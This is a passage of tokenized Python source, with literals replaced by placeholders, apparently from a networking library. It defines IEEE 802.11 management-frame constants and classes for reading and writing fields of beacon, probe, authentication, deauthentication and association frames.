get_sequence_control ( ) <EOL> return ( ( b >> <NUM_LIT:4> ) & <NUM_LIT> ) <EOL> def set_sequence_number ( self , value ) : <EOL> '<STR_LIT>' <EOL> mask = ( ~ <NUM_LIT> ) & <NUM_LIT> <EOL> masked = self . header . get_word ( <NUM_LIT:20> , "<STR_LIT:<>" ) & mask <EOL> nb = masked | ( ( value & <NUM_LIT> ) << <NUM_LIT:4> ) <EOL> self . header . set_word ( <NUM_LIT:20> , nb , "<STR_LIT:<>" ) <EOL> def get_frame_body ( self ) : <EOL> '<STR_LIT>' <EOL> return self . get_body_as_string ( ) <EOL> def set_frame_body ( self , data ) : <EOL> '<STR_LIT>' <EOL> self . load_body ( data ) <EOL> class DOT11_MANAGEMENT_ELEMENTS ( ) : <EOL> SSID = <NUM_LIT:0> <EOL> SUPPORTED_RATES = <NUM_LIT:1> <EOL> FH_PARAMETER_SET = <NUM_LIT:2> <EOL> DS_PARAMETER_SET = <NUM_LIT:3> <EOL> CF_PARAMETER_SET = <NUM_LIT:4> <EOL> TIM = <NUM_LIT:5> <EOL> IBSS_PARAMETER_SET = <NUM_LIT:6> <EOL> COUNTRY = <NUM_LIT:7> <EOL> HOPPING_PARAMETER = <NUM_LIT:8> <EOL> HOPPING_TABLE = <NUM_LIT:9> <EOL> REQUEST = <NUM_LIT:10> <EOL> BSS_LOAD = <NUM_LIT:11> <EOL> EDCA_PARAMETER_SET = <NUM_LIT:12> <EOL> TSPEC = <NUM_LIT> <EOL> TCLAS = <NUM_LIT> <EOL> SCHEDULE = <NUM_LIT:15> <EOL> CHALLENGE_TEXT = <NUM_LIT:16> <EOL> POWER_CONSTRAINT = <NUM_LIT:32> <EOL> POWER_CAPABILITY = <NUM_LIT> <EOL> TPC_REQUEST = <NUM_LIT> <EOL> TPC_REPORT = <NUM_LIT> <EOL> SUPPORTED_CHANNELS = <NUM_LIT> <EOL> CHANNEL_SWITCH_ANN = <NUM_LIT> <EOL> MEASURE_REQ = <NUM_LIT> <EOL> MEASURE_REP = <NUM_LIT> <EOL> QUIET = <NUM_LIT> <EOL> IBSS_DFS = <NUM_LIT> <EOL> ERP_INFO = <NUM_LIT> <EOL> TS_DELAY = <NUM_LIT> <EOL> TCLAS_PROCESSING = <NUM_LIT> <EOL> QOS_CAPABILITY = <NUM_LIT> <EOL> RSN = <NUM_LIT> <EOL> EXT_SUPPORTED_RATES = <NUM_LIT:50> <EOL> EXTENDED_CAPABILITIES = <NUM_LIT> <EOL> VENDOR_SPECIFIC = <NUM_LIT> <EOL> class Dot11ManagementHelper ( ProtocolPacket ) : <EOL> def __init__ ( self , header_size , tail_size , aBuffer = None ) : <EOL> self . __HEADER_BASE_SIZE = header_size <EOL> if aBuffer : <EOL> elements_length = self . 
__calculate_elements_length ( aBuffer [ self . __HEADER_BASE_SIZE : ] ) <EOL> header_size += elements_length <EOL> ProtocolPacket . __init__ ( self , header_size , tail_size ) <EOL> self . load_packet ( aBuffer ) <EOL> else : <EOL> ProtocolPacket . __init__ ( self , header_size , tail_size ) <EOL> def _find_element ( self , elements , element_id ) : <EOL> remaining = len ( elements ) <EOL> offset = <NUM_LIT:0> <EOL> while remaining > <NUM_LIT:0> : <EOL> ( id , length ) = struct . unpack ( "<STR_LIT>" , elements [ offset : offset + <NUM_LIT:2> ] ) <EOL> if element_id is None : <EOL> pass <EOL> elif id == element_id : <EOL> yield ( <NUM_LIT:0> , offset , length + <NUM_LIT:2> ) <EOL> length += <NUM_LIT:2> <EOL> offset += length <EOL> if length > remaining : <EOL> length = remaining ; <EOL> remaining -= length <EOL> yield ( - <NUM_LIT:1> , offset , None ) <EOL> def __calculate_elements_length ( self , elements ) : <EOL> gen_tp = self . _find_element ( elements , None ) <EOL> ( match , offset , length ) = gen_tp . next ( ) <EOL> if match != - <NUM_LIT:1> : <EOL> raise Exception ( "<STR_LIT>" % match ) <EOL> return offset <EOL> def _get_elements_generator ( self , element_id ) : <EOL> elements = self . get_header_as_string ( ) [ self . __HEADER_BASE_SIZE : ] <EOL> gen_tp = self . _find_element ( elements , element_id ) <EOL> while True : <EOL> ( match , offset , length ) = gen_tp . next ( ) <EOL> if match != <NUM_LIT:0> : <EOL> return <EOL> value_offset = offset + <NUM_LIT:2> <EOL> value_end = offset + length <EOL> value = elements [ value_offset : value_end ] <EOL> yield value <EOL> def _get_element ( self , element_id ) : <EOL> gen_get_element = self . _get_elements_generator ( element_id ) <EOL> try : <EOL> s = gen_get_element . next ( ) <EOL> if s is None : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> return s <EOL> except StopIteration : <EOL> pass <EOL> return None <EOL> def delete_element ( self , element_id , multiple = False ) : <EOL> header = self . 
get_header_as_string ( ) <EOL> elements = header [ self . __HEADER_BASE_SIZE : ] <EOL> gen_tp = self . _find_element ( elements , element_id ) <EOL> found = False <EOL> while True : <EOL> ( match , offset , length ) = gen_tp . next ( ) <EOL> if match != <NUM_LIT:0> : <EOL> break <EOL> start = self . __HEADER_BASE_SIZE + offset <EOL> header = header [ : start ] + header [ start + length : ] <EOL> found = True <EOL> if multiple is False : <EOL> break <EOL> if not found : <EOL> return False <EOL> self . load_header ( header ) <EOL> return True <EOL> def _set_element ( self , element_id , value , replace = True ) : <EOL> parameter = struct . pack ( '<STR_LIT>' % len ( value ) , element_id , len ( value ) , value ) <EOL> header = self . get_header_as_string ( ) <EOL> elements = header [ self . __HEADER_BASE_SIZE : ] <EOL> gen_tp = self . _find_element ( elements , element_id ) <EOL> found = False <EOL> while True : <EOL> ( match , offset , length ) = gen_tp . next ( ) <EOL> start = self . __HEADER_BASE_SIZE + offset <EOL> if match == <NUM_LIT:0> and replace : <EOL> header = header [ : start ] + parameter + header [ start + length : ] <EOL> found = True <EOL> break <EOL> elif match > <NUM_LIT:0> : <EOL> header = header [ : start ] + parameter + header [ start : ] <EOL> found = True <EOL> break <EOL> else : <EOL> break <EOL> if not found : <EOL> header = header + parameter <EOL> self . load_header ( header ) <EOL> class Dot11ManagementBeacon ( Dot11ManagementHelper ) : <EOL> '<STR_LIT>' <EOL> __HEADER_BASE_SIZE = <NUM_LIT:12> <EOL> def __init__ ( self , aBuffer = None ) : <EOL> header_size = self . __HEADER_BASE_SIZE <EOL> tail_size = <NUM_LIT:0> <EOL> Dot11ManagementHelper . __init__ ( self , header_size , tail_size , aBuffer ) <EOL> def get_timestamp ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_long_long ( <NUM_LIT:0> , "<STR_LIT:<>" ) <EOL> return b <EOL> def set_timestamp ( self , value ) : <EOL> '<STR_LIT>' <EOL> nb = value & <NUM_LIT> <EOL> self . 
header . set_long_long ( <NUM_LIT:0> , nb , "<STR_LIT:<>" ) <EOL> def get_beacon_interval ( self ) : <EOL> '<STR_LIT>' '<STR_LIT>' <EOL> b = self . header . get_word ( <NUM_LIT:8> , "<STR_LIT:<>" ) <EOL> return b <EOL> def set_beacon_interval ( self , value ) : <EOL> '<STR_LIT>' <EOL> nb = value & <NUM_LIT> <EOL> self . header . set_word ( <NUM_LIT:8> , nb , "<STR_LIT:<>" ) <EOL> def get_capabilities ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_word ( <NUM_LIT:10> , "<STR_LIT:<>" ) <EOL> return b <EOL> def set_capabilities ( self , value ) : <EOL> '<STR_LIT>' <EOL> nb = value & <NUM_LIT> <EOL> self . header . set_word ( <NUM_LIT:10> , nb , "<STR_LIT:<>" ) <EOL> def get_ssid ( self ) : <EOL> "<STR_LIT>" "<STR_LIT>" <EOL> return self . _get_element ( DOT11_MANAGEMENT_ELEMENTS . SSID ) <EOL> def set_ssid ( self , ssid ) : <EOL> self . _set_element ( DOT11_MANAGEMENT_ELEMENTS . SSID , ssid ) <EOL> def get_supported_rates ( self , human_readable = False ) : <EOL> "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" <EOL> s = self . _get_element ( DOT11_MANAGEMENT_ELEMENTS . SUPPORTED_RATES ) <EOL> if s is None : <EOL> return None <EOL> rates = struct . unpack ( '<STR_LIT>' % len ( s ) , s ) <EOL> if not human_readable : <EOL> return rates <EOL> rates_Mbs = tuple ( map ( lambda x : ( x & <NUM_LIT> ) * <NUM_LIT:0.5> , rates ) ) <EOL> return rates_Mbs <EOL> def set_supported_rates ( self , rates ) : <EOL> "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" <EOL> qty_rates = len ( rates ) <EOL> if qty_rates > <NUM_LIT:8> : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> rates_string = struct . pack ( '<STR_LIT:B>' * qty_rates , * rates ) <EOL> self . _set_element ( DOT11_MANAGEMENT_ELEMENTS . SUPPORTED_RATES , rates_string ) <EOL> def get_ds_parameter_set ( self ) : <EOL> "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" <EOL> s = self . _get_element ( DOT11_MANAGEMENT_ELEMENTS . DS_PARAMETER_SET ) <EOL> if s is None : <EOL> return None <EOL> ( ch , ) = struct . 
unpack ( '<STR_LIT:B>' , s ) <EOL> return ch <EOL> def set_ds_parameter_set ( self , channel ) : <EOL> "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" <EOL> channel_string = struct . pack ( '<STR_LIT:B>' , channel ) <EOL> self . _set_element ( DOT11_MANAGEMENT_ELEMENTS . DS_PARAMETER_SET , channel_string ) <EOL> def get_rsn ( self ) : <EOL> "<STR_LIT>" <EOL> s = self . _get_element ( DOT11_MANAGEMENT_ELEMENTS . RSN ) <EOL> if s is None : <EOL> return None <EOL> return s <EOL> def set_rsn ( self , data ) : <EOL> "<STR_LIT>" <EOL> self . _set_element ( DOT11_MANAGEMENT_ELEMENTS . RSN , data ) <EOL> def get_vendor_specific ( self ) : <EOL> "<STR_LIT>" "<STR_LIT>" <EOL> "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" <EOL> vs = [ ] <EOL> gen_get_element = self . _get_elements_generator ( DOT11_MANAGEMENT_ELEMENTS . VENDOR_SPECIFIC ) <EOL> try : <EOL> while <NUM_LIT:1> : <EOL> s = gen_get_element . next ( ) <EOL> if s is None : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> oui = s [ : <NUM_LIT:3> ] <EOL> data = s [ <NUM_LIT:3> : ] <EOL> vs . append ( ( oui , data ) ) <EOL> except StopIteration : <EOL> pass <EOL> return vs <EOL> def add_vendor_specific ( self , oui , data ) : <EOL> "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" <EOL> max_data_len = <NUM_LIT:255> - <NUM_LIT:3> <EOL> data_len = len ( data ) <EOL> if data_len > max_data_len : <EOL> raise Exception ( "<STR_LIT>" % max_data ) <EOL> if len ( oui ) > <NUM_LIT:3> : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> self . _set_element ( DOT11_MANAGEMENT_ELEMENTS . VENDOR_SPECIFIC , oui + data , replace = False ) <EOL> class Dot11ManagementProbeRequest ( Dot11ManagementHelper ) : <EOL> '<STR_LIT>' <EOL> def __init__ ( self , aBuffer = None ) : <EOL> header_size = <NUM_LIT:0> <EOL> tail_size = <NUM_LIT:0> <EOL> Dot11ManagementHelper . __init__ ( self , header_size , tail_size , aBuffer ) <EOL> def get_ssid ( self ) : <EOL> "<STR_LIT>" "<STR_LIT>" <EOL> return self . _get_element ( DOT11_MANAGEMENT_ELEMENTS . 
SSID ) <EOL> def set_ssid ( self , ssid ) : <EOL> self . _set_element ( DOT11_MANAGEMENT_ELEMENTS . SSID , ssid ) <EOL> def get_supported_rates ( self , human_readable = False ) : <EOL> "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" <EOL> s = self . _get_element ( DOT11_MANAGEMENT_ELEMENTS . SUPPORTED_RATES ) <EOL> if s is None : <EOL> return None <EOL> rates = struct . unpack ( '<STR_LIT>' % len ( s ) , s ) <EOL> if not human_readable : <EOL> return rates <EOL> rates_Mbs = tuple ( map ( lambda x : ( x & <NUM_LIT> ) * <NUM_LIT:0.5> , rates ) ) <EOL> return rates_Mbs <EOL> def set_supported_rates ( self , rates ) : <EOL> "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" <EOL> qty_rates = len ( rates ) <EOL> if qty_rates > <NUM_LIT:8> : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> rates_string = struct . pack ( '<STR_LIT:B>' * qty_rates , * rates ) <EOL> self . _set_element ( DOT11_MANAGEMENT_ELEMENTS . SUPPORTED_RATES , rates_string ) <EOL> class Dot11ManagementProbeResponse ( Dot11ManagementBeacon ) : <EOL> '<STR_LIT>' <EOL> def __init__ ( self , aBuffer = None ) : <EOL> Dot11ManagementBeacon . 
__init__ ( self , aBuffer ) <EOL> class DOT11_REASON_CODES ( ) : <EOL> UNSPECIFIED_REASON = <NUM_LIT:1> <EOL> PREV_AUTH_NO_LONGER_VALID = <NUM_LIT:2> <EOL> DEAUTH_STA_IS_LEAVING = <NUM_LIT:3> <EOL> DISASS_DUE_TO_INACTIVITY = <NUM_LIT:4> <EOL> DISASS_AP_UNABLE_HANDLE_ALL_STA = <NUM_LIT:5> <EOL> C2_FRAME_FROM_NONAUTHENTICATED_STA = <NUM_LIT:6> <EOL> C3_FRAME_FROM_NONASSOCIATED_STA = <NUM_LIT:7> <EOL> DISSASS_STA_IS_LEAVING = <NUM_LIT:8> <EOL> STA_REQ_NOT_AUTH_STA = <NUM_LIT:9> <EOL> DISASS_POWER_CAP_IE_UNNACCEPTABLE = <NUM_LIT:10> <EOL> DISASS_SUP_CH_IE_UNNACCEPTABLE = <NUM_LIT:11> <EOL> INVALID_IE = <NUM_LIT> <EOL> MIC_FAILURE = <NUM_LIT> <EOL> FOUR_WAY_HANDSHAKE_TIMEOUT = <NUM_LIT:15> <EOL> GROUP_KEY_HANDSHAKE_TIMEOUT = <NUM_LIT:16> <EOL> IE_FOUR_WAY_HANDSHAKE_DIFFERENT = <NUM_LIT> <EOL> INVALID_GROUP_CIPHER = <NUM_LIT> <EOL> INVALID_PAIRWISE_CIPHER = <NUM_LIT> <EOL> INVALID_AKMP = <NUM_LIT:20> <EOL> UNSUPPORTED_RSN_IE_VERSION = <NUM_LIT> <EOL> INVALID_RSN_IE_CAP = <NUM_LIT> <EOL> X_AUTH_FAILED = <NUM_LIT> <EOL> CIPHER_SUITE_REJECTED_SECURITY_POLICY = <NUM_LIT> <EOL> DISASS_QOS_RELATED_REASON = <NUM_LIT:32> <EOL> DISASS_QOS_UNSUFFICIENT_BANDWIDTH = <NUM_LIT> <EOL> DISASS_EXCESSIVE_FRAMES_WITHOUT_ACK = <NUM_LIT> <EOL> DISASS_STA_TX_OUTSIDE_TXOPS = <NUM_LIT> <EOL> REQ_STA_LEAVING = <NUM_LIT> <EOL> REQ_STA_NOT_WANT_MECHANISM = <NUM_LIT> <EOL> REQ_STA_RECV_FRAMES_WHICH_SETUP_REQ = <NUM_LIT> <EOL> REQ_STA_DUE_TIMEOUT = <NUM_LIT> <EOL> STA_NOT_SUPPORT_CIPHER_SUITE = <NUM_LIT> <EOL> class Dot11ManagementDeauthentication ( ProtocolPacket ) : <EOL> '<STR_LIT>' <EOL> def __init__ ( self , aBuffer = None ) : <EOL> header_size = <NUM_LIT:2> <EOL> tail_size = <NUM_LIT:0> <EOL> if aBuffer : <EOL> ProtocolPacket . __init__ ( self , header_size , tail_size ) <EOL> self . load_packet ( aBuffer ) <EOL> else : <EOL> ProtocolPacket . __init__ ( self , header_size , tail_size ) <EOL> def get_reason_code ( self ) : <EOL> "<STR_LIT>" <EOL> return self . header . 
get_word ( <NUM_LIT:0> , "<STR_LIT:<>" ) <EOL> def set_reason_code ( self , rc ) : <EOL> self . header . set_word ( <NUM_LIT:0> , rc , "<STR_LIT:<>" ) <EOL> class DOT11_AUTH_ALGORITHMS ( ) : <EOL> OPEN = <NUM_LIT:0> <EOL> SHARED_KEY = <NUM_LIT:1> <EOL> class DOT11_AUTH_STATUS_CODES ( ) : <EOL> SUCCESSFUL = <NUM_LIT:0> <EOL> UNSPECIFIED_FAILURE = <NUM_LIT:1> <EOL> CAP_REQ_UNSUPPORTED = <NUM_LIT:10> <EOL> REASS_DENIED_CANNOT_CONFIRM_ASS_EXISTS = <NUM_LIT:11> <EOL> ASS_DENIED_REASON_OUTSIDE_SCOPE_STANDARD = <NUM_LIT:12> <EOL> STA_NOT_SUPPORT_AUTH_ALGORITHM = <NUM_LIT> <EOL> AUTH_SEQ_OUT_OF_EXPECTED = <NUM_LIT> <EOL> AUTH_REJECTED_CHALLENGE_FAILURE = <NUM_LIT:15> <EOL> AUTH_REJECTED_TIMEOUT = <NUM_LIT:16> <EOL> ASS_DENIED_AP_UNABLE_HANDLE_MORE_STA = <NUM_LIT> <EOL> ASS_DENIED_STA_NOT_SUPPORTING_DATA_RATES = <NUM_LIT> <EOL> ASS_DENIED_STA_NOT_SUPPORTING_SHORT_PREAMBLE = <NUM_LIT> <EOL> ASS_DENIED_STA_NOT_SUPPORTING_PBCC_MODULATION = <NUM_LIT:20> <EOL> ASS_DENIED_STA_NOT_SUPPORTING_CHANNEL_AGILITY = <NUM_LIT> <EOL> ASS_REQUEST_REJECTED_SPACTRUM_MGT_CAP = <NUM_LIT> <EOL> ASS_REQUEST_REJECTED_POWER_CAP_IE_UNNACCEPTABLE = <NUM_LIT> <EOL> ASS_REQUEST_REJECTED_SUP_CH_IE_UNNACCEPTABLE = <NUM_LIT> <EOL> ASS_DENIED_STA_NOT_SUPPORTING_SHORT_SLOT_TIME = <NUM_LIT> <EOL> ASS_DENIED_STA_NOT_SUPPORTING_DSSS_OFDM = <NUM_LIT> <EOL> UNSPECIFIED_QOS = <NUM_LIT:32> <EOL> ASS_DENIED_QOS_UNSUFFICIENT_BANDWIDTH = <NUM_LIT> <EOL> ASS_DENIED_EXCESSIVE_FRAME_LOST = <NUM_LIT> <EOL> ASS_DENIED_STA_NOT_SUPPORT_QOS = <NUM_LIT> <EOL> REQ_HAS_BEEN_DECLINED = <NUM_LIT> <EOL> REQ_NOT_SUCCESSFUL_PARAM_INVALID_VALUE = <NUM_LIT> <EOL> TSPEC = <NUM_LIT> <EOL> INVALID_IE = <NUM_LIT> <EOL> INVALID_GROUP_CIPHER = <NUM_LIT> <EOL> INVALID_PAIRWISE_CIPHER = <NUM_LIT> <EOL> INVALID_AKMP = <NUM_LIT> <EOL> UNSUPPORTED_RSN_IE_VERSION = <NUM_LIT> <EOL> INVALID_RSN_IE_CAP = <NUM_LIT> <EOL> CIPHER_SUITE_REJECTED_SECURITY_POLICY = <NUM_LIT> <EOL> TS_NOT_CREATED = <NUM_LIT> <EOL> DIRECT_LINK_NOT_ALLOWED_BSS_POLICY = 
<NUM_LIT> <EOL> DST_STA_NOT_PRESENT_IN_BSS = <NUM_LIT> <EOL> DST_STA_NOT_QOS_STA = <NUM_LIT:50> <EOL> ASS_DENIED_LISTEN_INTERVAL_TOO_LARGE = <NUM_LIT> <EOL> class Dot11ManagementAuthentication ( Dot11ManagementHelper ) : <EOL> '<STR_LIT>' <EOL> __HEADER_BASE_SIZE = <NUM_LIT:6> <EOL> def __init__ ( self , aBuffer = None ) : <EOL> header_size = self . __HEADER_BASE_SIZE <EOL> tail_size = <NUM_LIT:0> <EOL> Dot11ManagementHelper . __init__ ( self , header_size , tail_size , aBuffer ) <EOL> def get_authentication_algorithm ( self ) : <EOL> "<STR_LIT>" <EOL> return self . header . get_word ( <NUM_LIT:0> , "<STR_LIT:<>" ) <EOL> def set_authentication_algorithm ( self , algorithm ) : <EOL> "<STR_LIT>" <EOL> self . header . set_word ( <NUM_LIT:0> , algorithm , "<STR_LIT:<>" ) <EOL> def get_authentication_sequence ( self ) : <EOL> "<STR_LIT>" <EOL> return self . header . get_word ( <NUM_LIT:2> , "<STR_LIT:<>" ) <EOL> def set_authentication_sequence ( self , seq ) : <EOL> "<STR_LIT>" <EOL> self . header . set_word ( <NUM_LIT:2> , seq , "<STR_LIT:<>" ) <EOL> def get_authentication_status ( self ) : <EOL> "<STR_LIT>" <EOL> return self . header . get_word ( <NUM_LIT:4> , "<STR_LIT:<>" ) <EOL> def set_authentication_status ( self , status ) : <EOL> "<STR_LIT>" <EOL> self . header . set_word ( <NUM_LIT:4> , status , "<STR_LIT:<>" ) <EOL> def get_challenge_text ( self ) : <EOL> return self . _get_element ( DOT11_MANAGEMENT_ELEMENTS . CHALLENGE_TEXT ) <EOL> def set_challenge_text ( self , challenge ) : <EOL> self . _set_element ( DOT11_MANAGEMENT_ELEMENTS . CHALLENGE_TEXT , challenge ) <EOL> def get_vendor_specific ( self ) : <EOL> "<STR_LIT>" "<STR_LIT>" <EOL> "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" <EOL> vs = [ ] <EOL> gen_get_element = self . _get_elements_generator ( DOT11_MANAGEMENT_ELEMENTS . VENDOR_SPECIFIC ) <EOL> try : <EOL> while <NUM_LIT:1> : <EOL> s = gen_get_element . 
next ( ) <EOL> if s is None : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> oui = s [ : <NUM_LIT:3> ] <EOL> data = s [ <NUM_LIT:3> : ] <EOL> vs . append ( ( oui , data ) ) <EOL> except StopIteration : <EOL> pass <EOL> return vs <EOL> def add_vendor_specific ( self , oui , data ) : <EOL> "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" <EOL> max_data_len = <NUM_LIT:255> - <NUM_LIT:3> <EOL> data_len = len ( data ) <EOL> if data_len > max_data_len : <EOL> raise Exception ( "<STR_LIT>" % max_data ) <EOL> if len ( oui ) > <NUM_LIT:3> : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> self . _set_element ( DOT11_MANAGEMENT_ELEMENTS . VENDOR_SPECIFIC , oui + data , replace = False ) <EOL> class Dot11ManagementDisassociation ( Dot11ManagementDeauthentication ) : <EOL> '<STR_LIT>' <EOL> def __init__ ( self , aBuffer = None ) : <EOL> Dot11ManagementDeauthentication . __init__ ( self , aBuffer ) <EOL> class Dot11ManagementAssociationRequest ( Dot11ManagementHelper ) : <EOL> '<STR_LIT>' <EOL> __HEADER_BASE_SIZE = <NUM_LIT:4> <EOL> def __init__ ( self , aBuffer = None ) : <EOL> header_size = self . __HEADER_BASE_SIZE <EOL> tail_size = <NUM_LIT:0> <EOL> Dot11ManagementHelper . __init__ ( self , header_size , tail_size , aBuffer ) <EOL> def get_capabilities ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_word ( <NUM_LIT:0> , "<STR_LIT:<>" ) <EOL> return b <EOL> def set_capabilities ( self , value ) : <EOL> '<STR_LIT>' <EOL> nb = value & <NUM_LIT> <EOL> self . header . set_word ( <NUM_LIT:0> , nb , "<STR_LIT:<>" ) <EOL> def get_listen_interval ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_word ( <NUM_LIT:2> , "<STR_LIT:<>" ) <EOL> return b <EOL> def set_listen_interval ( self , value ) : <EOL> '<STR_LIT>' <EOL> self . header . set_word ( <NUM_LIT:2> , value , "<STR_LIT:<>" ) <EOL> def get_ssid ( self ) : <EOL> "<STR_LIT>" "<STR_LIT>" <EOL> return self . _get_element ( DOT11_MANAGEMENT_ELEMENTS . SSID ) <EOL> def set_ssid ( self , ssid ) : <EOL> self . 
_set_element ( DOT11_MANAGEMENT_ELEMENTS . SSID , ssid ) <EOL> def get_supported_rates ( self , human_readable = False ) : <EOL> "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" <EOL> s = self . _get_element ( DOT11_MANAGEMENT_ELEMENTS . SUPPORTED_RATES ) <EOL> if s is None : <EOL> return None <EOL> rates = struct . unpack ( '<STR_LIT>' % len ( s ) , s ) <EOL> if not human_readable : <EOL> return rates <EOL> rates_Mbs = tuple ( map ( lambda x : ( x & <NUM_LIT> ) * <NUM_LIT:0.5> , rates ) ) <EOL> return rates_Mbs <EOL> def set_supported_rates ( self , rates ) : <EOL> "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" <EOL> qty_rates = len ( rates ) <EOL> if qty_rates > <NUM_LIT:8> : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> rates_string = struct . pack ( '<STR_LIT:B>' * qty_rates , * rates ) <EOL> self . _set_element ( DOT11_MANAGEMENT_ELEMENTS . SUPPORTED_RATES , rates_string ) <EOL> def get_rsn ( self ) : <EOL> "<STR_LIT>" <EOL> s = self . _get_element ( DOT11_MANAGEMENT_ELEMENTS . RSN ) <EOL> if s is None : <EOL> return None <EOL> return s <EOL> def set_rsn ( self , data ) : <EOL> "<STR_LIT>" <EOL> self . _set_element ( DOT11_MANAGEMENT_ELEMENTS . RSN , data ) <EOL> def get_vendor_specific ( self ) : <EOL> "<STR_LIT>" "<STR_LIT>" <EOL> "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" <EOL> vs = [ ] <EOL> gen_get_element = self . _get_elements_generator ( DOT11_MANAGEMENT_ELEMENTS . VENDOR_SPECIFIC ) <EOL> try : <EOL> while <NUM_LIT:1> : <EOL> s = gen_get_element . next ( ) <EOL> if s is None : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> oui = s [ : <NUM_LIT:3> ] <EOL> data = s [ <NUM_LIT:3> : ] <EOL> vs . 
append ( ( oui , data ) ) <EOL> except StopIteration : <EOL> pass <EOL> return vs <EOL> def add_vendor_specific ( self , oui , data ) : <EOL> "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" <EOL> max_data_len = <NUM_LIT:255> - <NUM_LIT:3> <EOL> data_len = len ( data ) <EOL> if data_len > max_data_len : <EOL> raise Exception ( "<STR_LIT>" % max_data ) <EOL> if len ( oui ) > <NUM_LIT:3> : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> self . _set_element ( DOT11_MANAGEMENT_ELEMENTS . VENDOR_SPECIFIC , oui + data , replace = False ) <EOL> class Dot11ManagementAssociationResponse ( Dot11ManagementHelper ) : <EOL> '<STR_LIT>' <EOL> __HEADER_BASE_SIZE = <NUM_LIT:6> <EOL> def __init__ ( self , aBuffer = None ) : <EOL> header_size = self . __HEADER_BASE_SIZE <EOL> tail_size = <NUM_LIT:0> <EOL> Dot11ManagementHelper . __init__ ( self , header_size , tail_size , aBuffer ) <EOL> def get_capabilities ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_word ( <NUM_LIT:0> , "<STR_LIT:<>" ) <EOL> return b <EOL> def set_capabilities ( self , value ) : <EOL> '<STR_LIT>' <EOL> nb = value & <NUM_LIT> <EOL> self . header . set_word ( <NUM_LIT:0> , nb , "<STR_LIT:<>" ) <EOL> def get_status_code ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_word ( <NUM_LIT:2> , "<STR_LIT:<>" ) <EOL> return b <EOL> def set_status_code ( self , value ) : <EOL> '<STR_LIT>' <EOL> self . header . set_word ( <NUM_LIT:2> , value , "<STR_LIT:<>" ) <EOL> def get_association_id ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_word ( <NUM_LIT:4> , "<STR_LIT:<>" ) <EOL> return b <EOL> def set_association_id ( self , value ) : <EOL> '<STR_LIT>' <EOL> self . header . set_word ( <NUM_LIT:4> , value , "<STR_LIT:<>" ) <EOL> def get_supported_rates ( self , human_readable = False ) : <EOL> "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" <EOL> s = self . _get_element ( DOT11_MANAGEMENT_ELEMENTS . SUPPORTED_RATES ) <EOL> if s is None : <EOL> return None <EOL> rates = struct . 
unpack ( '<STR_LIT>' % len ( s ) , s ) <EOL> if not human_readable : <EOL> return rates <EOL> rates_Mbs = tuple ( map ( lambda x : ( x & <NUM_LIT> ) * <NUM_LIT:0.5> , rates ) ) <EOL> return rates_Mbs <EOL> def set_supported_rates ( self , rates ) : <EOL> "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" <EOL> qty_rates = len ( rates ) <EOL> if qty_rates > <NUM_LIT:8> : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> rates_string = struct . pack ( '<STR_LIT:B>' * qty_rates , * rates ) <EOL> self . _set_element ( DOT11_MANAGEMENT_ELEMENTS . SUPPORTED_RATES , rates_string ) <EOL> def get_vendor_specific ( self ) : <EOL> "<STR_LIT>" "<STR_LIT>" <EOL> "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" <EOL> vs = [ ] <EOL> gen_get_element = self . _get_elements_generator ( DOT11_MANAGEMENT_ELEMENTS . VENDOR_SPECIFIC ) <EOL> try : <EOL> while <NUM_LIT:1> : <EOL> s = gen_get_element . next ( ) <EOL> if s is None : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> oui = s [ : <NUM_LIT:3> ] <EOL> data = s [ <NUM_LIT:3> : ] <EOL> vs . append ( ( oui , data ) ) <EOL> except StopIteration : <EOL> pass <EOL> return vs <EOL> def add_vendor_specific ( self , oui , data ) : <EOL> "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" <EOL> max_data_len = <NUM_LIT:255> - <NUM_LIT:3> <EOL> data_len = len ( data ) <EOL> if data_len > max_data_len : <EOL> raise Exception ( "<STR_LIT>" % max_data ) <EOL> if len ( oui ) > <NUM_LIT:3> : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> self . _set_element ( DOT11_MANAGEMENT_ELEMENTS . VENDOR_SPECIFIC , oui + data , replace = False ) <EOL> class Dot11ManagementReassociationRequest ( Dot11ManagementHelper ) : <EOL> '<STR_LIT>' <EOL> __HEADER_BASE_SIZE = <NUM_LIT:10> <EOL> def __init__ ( self , aBuffer = None ) : <EOL> header_size = self . __HEADER_BASE_SIZE <EOL> tail_size = <NUM_LIT:0> <EOL> Dot11ManagementHelper . 